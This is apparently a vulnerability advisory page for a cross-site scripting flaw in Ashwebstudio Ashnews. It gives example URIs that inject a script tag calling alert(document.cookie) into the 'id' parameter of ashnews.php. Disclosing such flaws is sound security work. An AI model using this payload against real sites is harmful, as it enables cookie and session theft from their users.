Ashwebstudio Ashnews Cross-Site Scripting Vulnerability

info
discussion
exploit
solution
references

Ashwebstudio Ashnews Cross-Site Scripting Vulnerability

An exploit is not required.

Example URI have been provided:

http://www.example.com/[path]/ashnews.php?page=showcomments&id=<script><script>alert(document.cookie)</script>

http://www.example.com/[path]/ashnews.php?page=showcomments&id=[xss]